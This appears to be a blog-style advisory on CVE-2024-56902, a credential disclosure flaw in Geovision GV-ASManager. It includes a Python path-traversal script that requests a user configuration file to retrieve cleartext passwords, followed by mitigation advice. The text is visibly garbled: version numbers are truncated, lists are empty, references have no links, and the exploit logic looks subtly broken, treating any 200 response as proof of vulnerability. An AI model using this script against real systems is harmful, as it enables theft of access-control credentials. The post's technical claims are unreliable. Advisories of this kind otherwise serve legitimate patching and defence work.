CVE-2024-56902: Geovision GV-ASManager Web Application Information Disclosure Vulnerability

CVE-2024-56902 is an information disclosure vulnerability found in Geovision's GV-ASManager web application, which enables unauthorized users to access account information, including cleartext passwords. This vulnerability affects Geovision GV-ASManager version v6.1.. or earlier.

In this post, we will dive deep into the details of CVE-2024-56902, including its background, the exploit code, and how to mitigate the vulnerability. We will also provide original references for those who want to explore further.

Background of Geovision GV-ASManager

Geovision's GV-ASManager is a web-based access control system designed for managing access points across different locations. It is a popular choice among businesses to secure their premises with various access control features, including door entry control, card management, and video surveillance integration.

However, researchers have found a security vulnerability in the software that could expose sensitive user account details.

Vulnerability Details

CVE-2024-56902 is classified as an information disclosure vulnerability, as it allows unauthorized access to sensitive information, specifically user account details. This includes:

Permissions level

The vulnerability exists in the GV-ASManager web application in versions v6.1.. and earlier due to improper handling of certain HTTP requests. Specifically, an attacker who can send crafted HTTP requests to the server can retrieve account information without requiring the appropriate access privileges.

Exploit Details

To exploit CVE-2024-56902, an attacker can send specially crafted HTTP GET requests to the vulnerable server. The code snippet below demonstrates this in Python:

import requests

# Replace the target_url with the vulnerable server URL.
target_url = "http://example.com";
exploit_url = target_url + "/../../conf/user.conf"

response = requests.get(exploit_url)

if response.status_code == 200:
    print("Vulnerable to CVE-2024-56902")
    print("Account details:")
    print(response.text)
else:
    print("Not vulnerable to CVE-2024-56902")

When executed, this script sends an HTTP GET request to a specific URL (/../../conf/user.conf) on the target server. If the response returns a 200 OK status, this indicates that the server is vulnerable to CVE-2024-56902.

Upon a successful exploit, the account details, including the cleartext passwords, will be displayed in the response text.

Mitigation and Remediation

To protect against CVE-2024-56902, it is recommended to update Geovision GV-ASManager to the latest version, which addresses this vulnerability. You can download the update from Geovision's official support page (https://www.geovision.com.tw/support).

Additionally, follow these best practices to strengthen the security of your GV-ASManager installation:

Below are the original references for those interested in exploring further

- CVE-2024-56902 Official Advisory
- Geovision's Response to CVE-2024-56902
- National Vulnerability Database Entry on CVE-2024-56902

Conclusion

CVE-2024-56902 is a critical information disclosure vulnerability in Geovision's GV-ASManager software that affects versions v6.1.. and earlier. It enables unauthorized users to gain access to sensitive user account information, including cleartext passwords.

To safeguard against this vulnerability, users should update their GV-ASManager installations to the latest version and follow best practices to maintain a secure access control system.

Timeline

Published on: 02/03/2025 21:15:14 UTC
Last modified on: 03/04/2025 22:15:39 UTC